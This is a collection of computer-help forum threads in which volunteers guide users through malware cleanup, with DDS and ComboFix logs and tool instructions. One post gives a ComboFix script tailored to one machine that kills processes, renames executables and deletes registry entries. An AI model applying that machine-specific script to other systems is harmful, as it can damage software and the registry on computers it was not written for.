DPF: {E2883E8F-472F-4FB0-9522-AC9BF37916A7} - hxxp://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab
TCP: DhcpNameServer = 212.27.40.241 212.27.40.240
TCP: Interfaces\{381EBDF8-7D99-4A61-A37E-CDBB7702D333} : DhcpNameServer = 212.27.40.241 212.27.40.240
Handler: wot - {C2A44D6B-CB9F-4663-88A6-DF2F26E4D952} - c:\program files\wot\WOT.dll
SEH: SABShellExecuteHook Class: {5ae067d3-9afb-48e0-853a-ebb7f4a000da} - c:\program files\superantispyware\SASSEH.DLL
.
============= SERVICES / DRIVERS ===============
.
R0 tdrpman273;Acronis Try&Decide and Restore Points filter (build 273);c:\windows\system32\drivers\tdrpm273.sys [2011-5-8 752128]
R1 aswSnx;aswSnx;c:\windows\system32\drivers\aswSnx.sys [2011-6-6 441176]
R1 aswSP;aswSP;c:\windows\system32\drivers\aswSP.sys [2011-6-6 307928]
R1 SASDIFSV;SASDIFSV;c:\program files\superantispyware\sasdifsv.sys [2010-2-17 12872]
R1 SASKUTIL;SASKUTIL;c:\program files\superantispyware\SASKUTIL.SYS [2010-5-10 67656]
R2 afcdpsrv;Acronis Nonstop Backup Service;c:\program files\common files\acronis\cdp\afcdpsrv.exe [2011-5-8 3246040]
R2 aswFsBlk;aswFsBlk;c:\windows\system32\drivers\aswFsBlk.sys [2011-6-6 19544]
R2 avast! Antivirus;avast! Antivirus;c:\program files\avast software\avast\AvastSvc.exe [2011-6-6 42184]
R2 MBAMService;MBAMService;c:\program files\malwarebytes' anti-malware\mbamservice.exe [2010-10-6 366640]
R3 afcdp;afcdp;c:\windows\system32\drivers\afcdp.sys [2011-5-8 167968]
R3 MBAMProtector;MBAMProtector;c:\windows\system32\drivers\mbam.sys [2010-10-6 22712]
S1 MpKsl27aa9cbe;MpKsl27aa9cbe;\??\c:\documents and settings\all users\application data\microsoft\microsoft antimalware\definition updates\{5cbe358e-fb9e-42b0-91c3-0ed11a46499b}\mpksl27aa9cbe.sys --> c:\documents and settings\all users\application data\microsoft\microsoft antimalware\definition updates\{5cbe358e-fb9e-42b0-91c3-0ed11a46499b}\MpKsl27aa9cbe.sys [?]
S1 MpKsl4965f692;MpKsl4965f692;\??\c:\documents and settings\all users\application data\microsoft\microsoft antimalware\definition updates\{b94c2a1f-2a70-45b2-8bdb-24a63750906f}\mpksl4965f692.sys --> c:\documents and settings\all users\application data\microsoft\microsoft antimalware\definition updates\{b94c2a1f-2a70-45b2-8bdb-24a63750906f}\MpKsl4965f692.sys [?]
S1 MpKsl82abaab5;MpKsl82abaab5;\??\c:\documents and settings\all users\application data\microsoft\microsoft antimalware\definition updates\{f553cfb7-36b1-404e-8dc1-3f6e5d6a268a}\mpksl82abaab5.sys --> c:\documents and settings\all users\application data\microsoft\microsoft antimalware\definition updates\{f553cfb7-36b1-404e-8dc1-3f6e5d6a268a}\MpKsl82abaab5.sys [?]
S1 MpKsla6a28098;MpKsla6a28098;c:\documents and settings\all users\application data\microsoft\microsoft antimalware\definition updates\{e3544fd3-0e42-4b6d-875f-784ae3705a58}\MpKsla6a28098.sys [2011-3-30 28752]
S2 KMService;KMService;c:\windows\system32\srvany.exe [2010-11-21 8192]
S3 Ambfilt;Ambfilt;c:\windows\system32\drivers\Ambfilt.sys [2010-10-6 1684736]
S3 appliandMP;appliandMP;

S3 MSICDSetup;MSICDSetup;\??\d:\cdriver.sys --> d:\CDriver.sys [?]
.
=============== Created Last 30 ================
.
2011-06-16 12:55:40 98816 ----a-w- c:\windows\sed.exe
2011-06-16 12:55:40 518144 ----a-w- c:\windows\SWREG.exe
2011-06-16 12:55:40 256512 ----a-w- c:\windows\PEV.exe
2011-06-16 12:55:40 208896 ----a-w- c:\windows\MBR.exe
2011-06-16 12:47:43 -------- d-----w- c:\documents and settings\briann\application data\SUPERAntiSpyware.com
2011-06-16 12:47:43 -------- d-----w- c:\documents and settings\all users\application data\SUPERAntiSpyware.com
2011-06-16 12:47:38 -------- d-----w- c:\program files\SUPERAntiSpyware
2011-06-16 00:24:22 -------- d-----w- c:\windows\SxsCaPendDel
2011-06-15 15:40:33 -------- d-sha-r- C:\cmdcons
2011-06-12 22:56:56 -------- d-----w- c:\documents and settings\all users\application data\IObit
2011-06-12 22:55:18 -------- d-----w- c:\documents and settings\briann\application data\IObit
2011-06-11 06:05:25 404640 ----a-w- c:\windows\system32\FlashPlayerCPLApp.cpl
2011-06-07 17:44:03 -------- d-----w- c:\documents and settings\briann\application data\Rovio
2011-06-06 09:22:19 441176 ----a-w- c:\windows\system32\drivers\aswSnx.sys
2011-06-06 09:22:13 40112 ----a-w- c:\windows\avastSS.scr
2011-06-06 09:22:08 -------- d-----w- c:\program files\AVAST Software
2011-06-05 21:48:22 -------- d-----w- c:\documents and settings\briann\application data\A0261641-01B1-467E-9DE5-2FFFBF73C059
2011-06-02 19:00:56 -------- d--h--w- c:\documents and settings\all users\application data\Common Files
2011-06-02 18:48:00 -------- d-----w- c:\documents and settings\all users\application data\MFAData
2011-05-29 17:25:52 -------- d-----w- C:\DVDVideoSoft
2011-05-19 15:46:51 -------- d-----w- c:\windows\system32\wbem\repository\FS
2011-05-19 15:46:51 -------- d-----w- c:\windows\system32\wbem\Repository
.
==================== Find3M ====================
.
2011-06-05 21:48:22 167968 ----a-w- c:\windows\system32\drivers\afcdp.sys
2011-06-05 21:48:19 752128 ----a-w- c:\windows\system32\drivers\tdrpm273.sys
2011-06-05 21:48:18 600928 ----a-w- c:\windows\system32\drivers\timntr.sys
2011-05-29 07:11:30 39984 ----a-w- c:\windows\system32\drivers\mbamswissarmy.sys
2011-05-29 07:11:20 22712 ----a-w- c:\windows\system32\drivers\mbam.sys
2011-05-08 21:19:24 170528 ----a-w- c:\windows\system32\drivers\snapman.sys
2011-05-02 15:31:52 692736 ----a-w- c:\windows\system32\inetcomm.dll
2011-04-29 16:19:43 456320 ----a-w- c:\windows\system32\drivers\mrxsmb.sys
2011-04-25 16:11:12 916480 ----a-w- c:\windows\system32\wininet.dll
2011-04-25 16:11:11 43520 ----a-w- c:\windows\system32\licmgr10.dll
2011-04-25 16:11:11 1469440 ------w- c:\windows\system32\inetcpl.cpl
2011-04-25 12:01:22 385024 ----a-w- c:\windows\system32\html.iec
2011-04-21 13:37:43 105472 ----a-w- c:\windows\system32\drivers\mup.sys
.
============= FINISH: 15:45:53.62 ===============

.
UNLESS SPECIFICALLY INSTRUCTED, DO NOT POST THIS LOG.
IF REQUESTED, ZIP IT UP & ATTACH IT
.
DDS (Ver_2011-06-12.02)
.
Microsoft Windows XP Home Edition
Boot Device: \Device\HarddiskVolume2
Install Date: 07/10/2010 07:12:24
System Uptime: 16/06/2011 15:00:58 (0 hours ago)
.
Motherboard: MICRO-STAR INTERNATIONAL CO.,LTD | | 760GM -E51 (MS-7596)
Processor: AMD Sempron(tm) 140 Processor | CPU1 | 3105/200mhz
.
==== Disk Partitions =========================
.
A: is Removable
C: is FIXED (NTFS) - 49 GiB total, 33.387 GiB free.
D: is FIXED (NTFS) - 466 GiB total, 441.431 GiB free.
E: is CDROM ()
F: is FIXED (NTFS) - 416 GiB total, 310.061 GiB free.
G: is CDROM ()
.
==== Disabled Device Manager Items =============
.
==== System Restore Points ===================
.
RP1: 16/06/2011 14:55:43 - System Checkpoint
.
==== Installed Programs ======================
.
32 Bit HP CIO Components Installer
AcronisTrueImageHome 2011
Adobe Flash Player 10 ActiveX
Adobe Flash Player 10 Plugin
Any Video Converter 3.2.3
ATI - Software Uninstall Utility
ATI AVIVO Codecs
ATI Catalyst Control Center
ATI Display Driver
Auslogics Registry Cleaner
avast! Free Antivirus
BufferChm
Catalyst Control Center - Branding
Catalyst Control Center Core Implementation
Catalyst Control Center Graphics Full Existing
Catalyst Control Center Graphics Full New
Catalyst Control Center Graphics Light
Catalyst Control Center Localization All
ccc-core-preinstall
ccc-core-static
ccc-utility
CCC Help Chinese Standard
CCC Help Chinese Traditional
CCC Help Czech
CCC Help Danish
CCC Help Dutch
CCC Help English
CCC Help Finnish
CCC Help French
CCC Help German
CCC Help Greek
CCC Help Hungarian
CCC Help Italian
CCC Help Japanese
CCC Help Korean
CCC Help Norwegian
CCC Help Polish
CCC Help Portuguese
CCC Help Russian
CCC Help Spanish
CCC Help Swedish
CCC Help Thai
.
==== Event Viewer Messages From Past Week ========
.
16/06/2011 14:56:56, error: Service Control Manager [7034] - The Print Spooler service terminated unexpectedly. It has done this 1 time(s).
16/06/2011 14:56:56, error: Service Control Manager [7034] - The Application Layer Gateway Service service terminated unexpectedly. It has done this 1 time(s).
15/06/2011 23:14:51, error: Service Control Manager [7023] - The Application Management service terminated with the following error: The specified module could not be found.
14/06/2011 23:21:05, error: Dhcp [1002] - The IP address lease 82.248.195.76 for the Network Card with network address 406186C9E263 has been denied by the DHCP server 82.248.195.254 (The DHCP Server sent a DHCPNACK message).
13/06/2011 23:20:34, error: Dhcp [1002] - The IP address lease 83.159.15.236 for the Network Card with network address 406186C9E263 has been denied by the DHCP server 83.159.15.254 (The DHCP Server sent a DHCPNACK message).
12/06/2011 23:20:51, error: Dhcp [1002] - The IP address lease 82.251.231.98 for the Network Card with network address 406186C9E263 has been denied by the DHCP server 82.251.231.254 (The DHCP Server sent a DHCPNACK message).
12/06/2011 08:00:41, error: Service Control Manager [7022] - The HP CUE DeviceDiscovery Service service hung on starting.
12/06/2011 01:14:11, error: Service Control Manager [7034] - The MBAMService service terminated unexpectedly. It has done this 1 time(s).
12/06/2011 01:14:11, error: Service Control Manager [7034] - The Acronis Nonstop Backup Service service terminated unexpectedly. It has done this 1 time(s).
12/06/2011 00:13:16, error: PlugPlayManager [11] - The device Root\LEGACY_SASKUTIL\0000 disappeared from the system without first being prepared for removal.
12/06/2011 00:13:16, error: PlugPlayManager [11] - The device Root\LEGACY_SASDIFSV\0000 disappeared from the system without first being prepared for removal.
11/06/2011 23:20:27, error: Dhcp [1002] - The IP address lease 82.64.79.130 for the Network Card with network address 406186C9E263 has been denied by the DHCP server 82.64.79.254 (The DHCP Server sent a DHCPNACK message).
10/06/2011 23:20:25, error: Dhcp [1002] - The IP address lease 82.253.220.111 for the Network Card with network address 406186C9E263 has been denied by the DHCP server 82.253.220.254 (The DHCP Server sent a DHCPNACK message).
09/06/2011 23:20:01, error: Dhcp [1002] - The IP address lease 82.64.209.201 for the Network Card with network address 406186C9E263 has been denied by the DHCP server 82.64.209.254 (The DHCP Server sent a DHCPNACK message).
.
==== End Of File ===========================

Registry cleaners are extremely powerful applications and their potential for harming your OS far outweighs any small potential for improving your computer's performance.
Auslogics Registry Cleaner
There are a number of them available and some are more safe than others. Keep in mind that no two registry cleaners work entirely the same way. Each vendor uses different criteria as to what constitutes a "bad" entry. One cleaner may find entries on your system that will not cause a problem when removed, another may not find the same entries, and still another may want to remove entries required for a program to work. Without research into what the registry entry selected for deletion is, a registry cleaner can end up being an automated method to cause problems with the registry.

For routine use by those not familiar with the registry, the benefits to your computer are negligible while the potential risks are great.

Further reading: XP Fixes Myth #1: Registry Cleaners
******************************************************
Download Security Check by screen317 from one of the following links and save it to your desktop.

Link 1
Link 2

* Unzip SecurityCheck.zip and a folder named Security Check should appear.
* Open the Security Check folder and double-click Security Check.bat
* Follow the on-screen instructions inside of the black box.
* A Notepad document should open automatically called checkup.txt
* Post the contents of that document in your next reply.

Note: If a security program requests permission from dig.exe to access the Internet, allow it to do so.
*****************************************************
SysProt Antirootkit

Download SysProt Antirootkit from the link below (you will find it at the bottom of the page under attachments, or you can get it from one of the mirrors).

http://sites.google.com/site/sysprotantirootkit/

Unzip it into a folder on your desktop.
  • Double click Sysprot.exe to start the program.
  • Click on the Log tab.
  • In the Write to log box select the following items.
    • Process << Selected
    • Kernel Modules << Selected
    • SSDT << Selected
    • Kernel Hooks << Selected
    • IRP Hooks << NOT Selected
    • Ports << NOT Selected
    • Hidden Files << Selected
  • At the bottom of the page
    • Hidden Objects Only << Selected
  • Click on the Create Log button on the bottom right.
  • After a few seconds a new window should appear.
  • Select Scan Root Drive. Click on the Start button.
  • When it is complete a new window will appear to indicate that the scan is finished.
  • The log will be saved automatically in the same folder Sysprot.exe was extracted to. Open the text file and copy/paste the log here.
Thanks SD, logs as requested.

Results of screen317's Security Check version 0.99.13
Windows XP Service Pack 3
Internet Explorer 8
``````````````````````````````
Antivirus/Firewall Check:

Windows Firewall Enabled!
avast! Free Antivirus
```````````````````````````````
Anti-malware/Other Utilities Check:

Malwarebytes' Anti-Malware
CCleaner
Auslogics Registry Cleaner
EasyCleaner
Java(TM) 6 Update 24
Out of date Java installed!
Flash Player Out of Date!
Adobe Flash Player 10.1.102.64
Mozilla Thunderbird (3.1.10) Thunderbird Out of Date!
````````````````````````````````
Process Check:
objlist.exe by Laurent

Malwarebytes' Anti-Malware mbamservice.exe
Malwarebytes' Anti-Malware mbamgui.exe
AVAST Software Avast AvastSvc.exe
AVAST Software Avast avastUI.exe
``````````End of Log````````````
SysProt AntiRootkit v1.0.1.0
by swatkat

******************************************************************************************
******************************************************************************************

No Hidden Processes found


Update Your Java (JRE)

Old versions of Java have vulnerabilities that malware can use to infect your system.

First Verify your Java Version

If there are any other version(s) installed then update now.

Get the new version (if needed)

If your version is out of date install the newest version of the Sun Java Runtime Environment.

Note: UNCHECK any pre-checked toolbar and/or software offered with the Java update. The pre-checked toolbars/software are not part of the Java update.

Be sure to close ALL open web browsers before starting the installation.

Remove any old versions

1. Download JavaRa and unzip the file to your Desktop.
2. Open JavaRA.exe and choose Remove Older Versions
3. Once complete exit JavaRA.

Additional Note: The Java Quick Starter (JQS.exe) adds a service to improve the initial startup time of Java applets and applications. To disable the JQS service if you don't want to use it, go to Start > Control Panel > Java > Advanced > Miscellaneous and uncheck the box for Java Quick Starter. Click OK and reboot your computer.
*************************************************
Please download the newest version of Adobe Acrobat Reader from Adobe.com

Before installing: it is important to remove older versions of Acrobat Reader since it does not do so automatically and old versions still leave you vulnerable.
Go to the Control Panel and enter Add or Remove Programs.
Search in the list for all previous installed versions of Adobe Acrobat Reader. Uninstall/Remove each of them.

Once old versions are gone, please install the newest version.
****************************************************
I'd like to scan your machine with ESET OnlineScan

•Hold down Control and click on the following link to open ESET OnlineScan in a new window.
ESET OnlineScan
•Click the button.
•For alternate browsers only: (Microsoft Internet Explorer users can skip these steps)
  • Click on to download the ESET Smart Installer. Save it to your desktop.
  • Double click on the icon on your desktop.
•Check
•Click the button.
•Accept any security warnings from your browser.
•Check
•Push the Start button.
•ESET will then download updates for itself, install itself, and begin scanning your computer. Please be patient as this can take some time.
•When the scan completes, push
•Push , and save the file to your desktop using a unique name, such as ESETScan. Include the contents of this report in your next reply.
•Push the button.
•Push
A log file will be saved here: C:\Program Files\ESET\ESET Online Scanner\log.txt

Sorry SD, got tied up.
All programs now up to date and ESET log is as follows.
[emailprotected] as CAB hook log:
OnlineScanner.ocx - registred OK
# version=7
# iexplore.exe=8.00.6001.18702 (longhorn_ie8_rtm(wmbla).090308-0339)
# OnlineScanner.ocx=1.0.0.6526
# api_version=3.0.2
# EOSSerial=7e0d20dfcc64494e9c93b2f68bdcb13f
# end=finished
# remove_checked=true
# archives_checked=true
# unwanted_checked=true
# unsafe_checked=false
# antistealth_checked=true
# utc_time=2011-06-18 01:16:55
# local_time=2011-06-18 03:16:55 (+0100, W. Europe Daylight Time)
# country="United Kingdom"
# lang=1033
# osver=5.1.2600 NT Service Pack 3
# compatibility_mode=512 16777215 100 0 21872299 21872299 0 0
# compatibility_mode=2560 16777215 100 0 0 0 0 0
# compatibility_mode=8192 67108863 100 0 0 0 0 0
# scanned=39631
# found=0
# cleaned=0
# scan_time=1473

That looks good. If there are no other issues, let's do some cleanup.

To uninstall ComboFix

  • Click the Start button. Click Run. For Vista: type in Run in the Start search, and click on Run in the results pane.
  • In the field, type in ComboFix /uninstall


(Note: Make sure there's a space between the word ComboFix and the forward-slash.)

  • Then, press Enter, or click OK.
  • This will uninstall ComboFix, delete its folders and files, hide System files and folders, and reset System Restore.
*********************************************
Clean out your temporary internet files and temp files.

Download TFC by OldTimer to your desktop.

Double-click TFC.exe to run it.

Note: If you are running on Vista, right-click on the file and choose Run As Administrator

TFC will close all programs when run, so make sure you have saved all your work before you begin.

* Click the Start button to begin the cleaning process.
* Depending on how often you clean temp files, execution time should be anywhere from a few seconds to a minute or two.
* Please let TFC run uninterrupted until it is finished.

Once TFC is finished it should restart your computer. If it does not, please manually restart the computer yourself to ensure a complete cleaning.
***********************************************
Use the Secunia Software Inspector to check for out of date software.

•Click Start Now

•Check the box next to Enable thorough system inspection.

•Click Start

•Allow the scan to finish and scroll down to see if any updates are needed.
•Update anything listed.
.
----------

Go to Microsoft Windows Update and get all critical updates.

----------

I suggest using WOT - Web of Trust. WOT is a free Internet security addon for your browser. It will keep you safe from online scams, identity theft, spyware, spam, viruses and unreliable shopping sites. WOT warns you before you interact with a risky website. It's easy and it's free.

SpywareBlaster- Secure your Internet Explorer to make it harder for ActiveX programs to run on your computer. Also stop certain cookies from being added to your computer when running Mozilla based browsers like Firefox.
* Using SpywareBlaster to protect your computer from Spyware and Malware
* If you don't know what ActiveX controls are, see here

Protect yourself against spyware using the Immunize feature in Spybot - Search & Destroy. Guide: Use Spybot's Immunize Feature to prevent spyware infection in real-time. Note: To ensure you have the latest Immunizations always update Spybot - Search & Destroy before Immunizing. Spybot - Search & Destroy FAQ

Check out Keeping Yourself Safe On The Web for tips and free tools to help keep you safe in the future.

Also see Slow Computer? It may not be Malware for free cleaning/maintenance tools to help keep your computer running smoothly.
Safe Surfing!
Have now followed all instructions.
Thanks very much for all your help SD.
Regards

You're welcome. I will lock this thread. If you need it reopened, please send me a PM.
3261.

Solve : Computer reboots at win logo even safe mode?

Answer»

Now that you're able to boot in Normal Mode, why don't we run some scans and see if we can find out what's happening?
Once I see the logs I can give you some advice on how to protect your computer.

Please do this: Hold CTRL, ALT and Delete all at once to bring up the Task Manager. In the Process tab click twice on the Memory Usage. That will list the highest to the lowest processes. Do a screen print and post it in your next reply.
How to post screenshots or images

SUPERAntiSpyware

If you already have SUPERAntiSpyware be sure to check for updates before scanning!

Download SuperAntispyware Free Edition (SAS)
* Double-click the icon on your desktop to run the installer.
* When asked to Update the program definitions, click Yes
* If you encounter any problems while downloading the updates, manually download and unzip them from here
* Next click the Preferences button.

•Under Start-Up Options uncheck Start SUPERAntiSpyware when Windows starts
* Click the Scanning Control tab.
* Under Scanner Options make sure only the following are checked:

•Close browsers before scanning
•Scan for tracking cookies
•Terminate memory threats before quarantining
Please leave the others unchecked

•Click the Close button to leave the control center screen.

* On the main screen click Scan your computer
* On the left check the box for the drive you are scanning.
* On the right choose Perform Complete Scan
* Click Next to start the scan. Please be patient while it scans your computer.
* After the scan is complete a summary box will appear. Click OK
* Make sure everything in the white box has a check next to it, then click Next
* It will quarantine what it found and if it asks if you want to reboot, click Yes

•To retrieve the removal information please do the following:
•After reboot, double-click the SUPERAntiSpyware icon on your desktop.
•Click Preferences. Click the Statistics/Logs tab.

•Under Scanner Logs, double-click SUPERAntiSpyware Scan Log.

•It will open in your default text editor (preferably Notepad).
Save the notepad file to your desktop by clicking (in notepad) File > Save As...

* Save the log somewhere you can easily find it. (normally the desktop)
* Click close and close again to exit the program.
* Copy and Paste the log in your post.
*********************************************
Download DDS from HERE or HERE and save it to your desktop.

Vista users right click on dds and select Run as administrator (you will receive a UAC prompt, please allow it)

* XP users Double click on dds to run it.
* If your antivirus or firewall try to block DDS then please allow it to run.
* When finished DDS will open two (2) logs.

1) DDS.txt
2) Attach.txt

* Save both logs to your desktop.
* Please copy and paste the entire contents of both logs in your next reply.

Note: DDS will instruct you to post the Attach.txt log as an attachment.
Please just post it as you would any other log by copying and pasting it into the reply.

Thanks Dave, I'll be back at my desktop computer tomorrow, so I'll follow your instructions and post results, thanks

3262.

Solve : No sound on flash embedded videos?

Answer»

Hi guys, running a Windows Vista laptop and the sound will not work on any flash videos. Basically I have updated all sound drivers, checked flash settings, uninstalled flash, reinstalled, but to no avail. Normal videos play OK, just online videos don't, please help

3263.

Solve : Am I just unlucky...?

Answer»

BACKGROUND - We had a home computer which picked up a bug of some sort, got it fixed through Hijack This but... subsequently found Trojan on a memory stick that had been used on that PC and laptops, this was also sorted.

ISSUES - I used the home PC (XP) and laptop (Vista) for managing my photos, after a short spell I could no longer read from my Pentax DSLR onto the laptop, stopped using the home PC and eventually got rid of it.

The Pentax broke, I bought a Canon - after a short while I could no longer read directly from the camera onto the laptop. The Canon was never attached to the home PC (now gone).

I have a new memory stick; I can read from it but every time I plug it in to the laptop I get a message saying I should scan and fix errors, none are ever found.

I bought a Seagate external hard drive and transferred all the useful stuff off my Vista laptop onto it, then attached it to my new 7 laptop - after a few days my laptop could no longer find the Seagate.

Have I been unlucky or is something odd whistling up my USBs every time I plug them in?

Thanks in advance for any advice.

I have a Seagate external hard drive for 3 years and have no problems, but it's always off until I need or update files to it.

The message you get about scanning and fixing errors is normal - ignore it. As for the external drive, try it on another computer to make sure it's still good. If it is, open disk management on the computer in question and tell us if you see the drive there.

3264.

Solve : Clicked on a tab I shouldn't have and then......?

Answer»

Ok. I will lock this thread. If you need it re-opened, please send me a pm.

This is a pm from the OP.

I needed to uninstall avg free in order to use combofix uninstall. Combofix eventually uninstalled..

..I needed to reinstall avg and it wouldn't work (so I haven't completed your final instructions) I experienced a situation like we discussed earlier; downloads would stop downloading and not complete. I started avg and got about 7% before the download stopped. Like a download stops because it needs to add more to the buffer but there is nothing getting it started again. So it took about 15 times to restart the avg download before it finally completed.

Restarted (did not run scan but updated av).

So I continued with final instructions and download TFC. Wouldn't work. A TFC pop up instantly occurs and asks yes to download. It doesn't go to a home page for me to select. The next instant popup says; "TFC cannot be run from a temp folder. Plz d/l to your desk top or......."

Stay in this thread or start a new one in Windows issues.
If TFC won't work, please try diskcleanup. You can find it under All Programs, Accessories, System Tools, diskcleanup.
The other problem with downloads won't complete; I don't feel that this is not a problem caused by malware. It probably has something to do with settings or with your Firewall.
Quote

Stay in this thread or start a new one in Windows issues.
It would be best to start a new one.

Ok. I'll complete the rest of these tasks with that in mind. I will start a new thread in Windows the subject; "Downloads won't complete".

Once again thanks.

You're welcome. I will lock this thread.
3265.

Solve : virus/malware/spyware programs running together?

Answer»

I currently am running Norton 360 premier for virus protection. I am also running stopzilla for spyware protection and recently had a worm sending out emails from my contacts. I also now am running Malwarebytes for malware protection and am thinking of buying their anti-malware pro.

In your guidelines section you state "You should only have one antivirus and one firewall active at any time. If you have two of either installed then only one should be running. Either uninstall one now before continuing or adjust the settings to where the real-time protection is not running. Having two running at the same time will just cause problems."

Are virus/spyware and malware programs different? and should I use all three or just one?

I have hp s3720f pc with windows vista. I will probably upgrade to windows 7 in a few months.


Quote

Are virus/spyware and malware programs different? and should I use all three or just one?
Anti-Virus programs are designed to protect against viruses only. Some have anti-malware built into the programs. You need other programs to protect against malware, spyware, rogues etc. You can have more than one of these running at any time. Sort of a layered approach to safety.

MalWareBytes-Anti-malware is very good and they now have a free trial period of full-time protection.

Many thanks.
3266.

Solve : does avira personal free antivirus have spyware protection or not??

Answer»

Latest free version of Avira, does it have antispyware like AVG and Avast or not?

You can check it out here. But MSE here has. Microsoft Security Essentials provides real-time protection for your home or small business PC that guards against viruses, spyware, and other malicious software.

3267.

Solve : Major attack and I don't know who to trust??

Answer»

Re-running ComboFix to remove infections:

  • Close any open browsers.
  • Close/disable all anti virus and anti malware programs so they do not interfere with the running of ComboFix.
  • Open notepad and copy/paste the text in the quotebox below into it:
    Quote
    KillAll::
    DDS::
    Trusted Zone: microsoft.com\update
    Trusted Zone: sympatico.ca\www
    Trusted Zone: windowsupdate.com\download

    RenV::
    c:\program files\Adobe\Reader 10.0\Reader\Reader_sl .exe
    c:\program files\Common Files\Adobe\ARM\1.0\AdobeARM .exe
    c:\program files\Common Files\Apple\Mobile Device Support\bin\AppleSyncNotifier .exe
    c:\program files\Common Files\InstallShield\UpdateService\issch .exe
    c:\program files\Common Files\Java\Java Update\jusched .exe
    c:\program files\D-Link\RangeBooster G WUA-2340\AirPlusCFG .exe
    c:\program files\Hewlett-Packard\HP Boot Optimizer\HPBootOp .exe
    c:\program files\HP\Digital Imaging\{33D6CC28-9F75-4d1b-A11D-98895B3A3729}\hphupd08 .exe
    c:\program files\HP\HP Software Update\HPWuSchd2 .exe
    c:\program files\HP DigitalMedia Archive\DMAScheduler .exe
    c:\program files\IObit\Advanced SystemCare 3\AWC .exe
    c:\program files\IObit\Advanced SystemCare 4\ASCTray .exe
    c:\program files\IObit\IObit Security 360\IS360tray .exe
    c:\program files\iTunes\iTunesHelper .exe
    c:\program files\Pando Networks\Media Booster\PMB .exe
    c:\program files\QuickTime\qttask .exe
    c:\windows\ehome\ehtray .exe
    c:\windows\SMINST\RECGUARD .exe

    Registry::
    [-HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Tpara]
    c:\windows\dmqusv2.dll

  • Save this as CFScript.txt, in the same location as ComboFix.exe



  • Referring to the picture above, drag CFScript into ComboFix.exe
  • When finished, it shall produce a log for you at C:\ComboFix.txt
  • Please post the contents of the log in your next reply.
Hi SuperDave,

Tried this once and it didn't work. Error message PEV.exe has encountered a problem and must close. Also tried to turn the firewall off after reboot and it didn't work. Perhaps I wasn't fast enough as the screen seems locked on the Online Armor message. I'm back online to redownload the ComboFix and start from scratch one more time. Another error message came up. One of those 0X800***** ones but I just clicked OK as ComboFix was still on the screen. I'll try it again. Still no luck. Online Armor seems to be stopping the process. It made me "Allow" 3 files when I restarted it to go back online. Do I have to rename the file again? Is there a way to stop the firewalls from starting. When Online Armor is disabled, Windows Firewall starts up and I have to jump to the Control panel to stop that. I'll try one more time while I wait for your reply. It may work now that I have OKed the files in Online Armor.

OK, third times a charm. Got a few error messages:

ONLINE_ARMOR_WTS: oasrv.exe - Application Error
Instruction at 0X00e5205c - memory could not read

oasrv.exe - Application Error
0X0040745e - 0X00e434a4

After the Combo Fix ran this time Online Armor is missing from the taskbar. It also wanted me to make a decision about module hidserv.dll and module %1 associated with regedit.exe. I blocked them both as I didn't know what they were.

Here is the log:

ComboFix 11-05-26.01 - HP_Administrator 26/05/2011 20:16:09.4.2 - x86
Microsoft Windows XP Professional 5.1.2600.3.1252.2.1033.18.958.482 [GMT -4:00]
Running from: c:\documents and settings\HP_Administrator\Desktop\ComboFix.exe
Command switches used :: c:\documents and settings\HP_Administrator\Desktop\CFScript.txt
AV: Microsoft Security Essentials *Disabled/Updated* {BCF43643-A118-4432-AEDE-D861FCBCFCDF}
AV: Microsoft Security Essentials *Disabled/Updated* {EDB4FA23-53B8-4AFA-8C5D-99752CCA7095}
FW: Online Armor Firewall *Disabled* {B797DAA0-7E2E-4711-8BB3-D12744F1922A}
.
.
((((((((((((((((((((((((( Files Created from 2011-04-27 to 2011-05-27 )))))))))))))))))))))))))))))))
.
.
2011-05-27 00:01 . 2011-05-27 00:01  28752  ----a-w-  c:\documents and settings\All Users\Application Data\Microsoft\Microsoft Antimalware\Definition Updates\{9FB231EF-0036-4D0F-85EA-3DF4A8ED3BAC}\MpKsl83bc2927.sys
2011-05-27 00:01 . 2011-05-18 16:37  6962000  ----a-w-  c:\documents and settings\All Users\Application Data\Microsoft\Microsoft Antimalware\Definition Updates\{9FB231EF-0036-4D0F-85EA-3DF4A8ED3BAC}\mpengine.dll
2011-05-26 23:41 . 2011-05-18 16:37  6962000  ----a-w-  c:\documents and settings\All Users\Application Data\Microsoft\Microsoft Antimalware\Definition Updates\Backup\mpengine.dll
2011-05-23 22:37 . 2011-05-23 22:37  388096  ----a-r-  c:\documents and settings\HP_Administrator\Application Data\Microsoft\Installer\{45A66726-69BC-466B-A7A4-12FCBA4883D7}\HiJackThis.exe
2011-05-23 22:36 . 2011-05-23 22:40  --------  d-----w-  c:\program files\Trend Micro
2011-05-23 22:23 . 2011-05-23 22:23  --------  d-----w-  c:\program files\TrendMicro
2011-05-23 21:33 . 2011-05-23 21:33  --------  d-----w-  c:\documents and settings\HP_Administrator\Application Data\Malwarebytes
2011-05-23 21:33 . 2010-12-20 22:09  38224  ----a-w-  c:\windows\system32\drivers\mbamswissarmy.sys
2011-05-23 21:33 . 2011-05-23 21:33  --------  d-----w-  c:\documents and settings\All Users\Application Data\Malwarebytes
2011-05-23 21:33 . 2010-12-20 22:08  20952  ----a-w-  c:\windows\system32\drivers\mbam.sys
2011-05-23 21:33 . 2011-05-23 21:33  --------  d-----w-  c:\program files\Malwarebytes' Anti-Malware
2011-05-23 17:55 . 2011-05-23 17:55  --------  d-----w-  c:\documents and settings\HP_Administrator\Application Data\SUPERAntiSpyware.com
2011-05-23 17:55 . 2011-05-23 17:55  --------  d-----w-  c:\documents and settings\All Users\Application Data\SUPERAntiSpyware.com
2011-05-23 17:54 . 2011-05-23 17:55  --------  d-----w-  c:\program files\SUPERAntiSpyware
2011-05-23 17:35 . 2011-05-23 17:35  --------  d-----w-  c:\program files\CCleaner
2011-05-23 16:44 . 2011-05-23 17:22  --------  d-----w-  c:\documents and settings\All Users\Application Data\OnlineArmor
2011-05-23 16:44 . 2011-05-23 16:45  --------  d-----w-  c:\documents and settings\HP_Administrator\Application Data\OnlineArmor
2011-05-23 16:43 . 2011-04-06 17:02  39048  ----a-w-  c:\windows\system32\drivers\oahlp32.sys
2011-05-23 16:43 . 2011-04-06 17:01  25192  ----a-w-  c:\windows\system32\drivers\OAmon.sys
2011-05-23 16:43 . 2011-04-06 17:01  29464  ----a-w-  c:\windows\system32\drivers\OAnet.sys
2011-05-23 16:43 . 2011-04-06 17:01  205864  ----a-w-  c:\windows\system32\drivers\OADriver.sys
2011-05-23 16:42 . 2011-05-27 00:03  --------  d-----w-  c:\program files\Online Armor
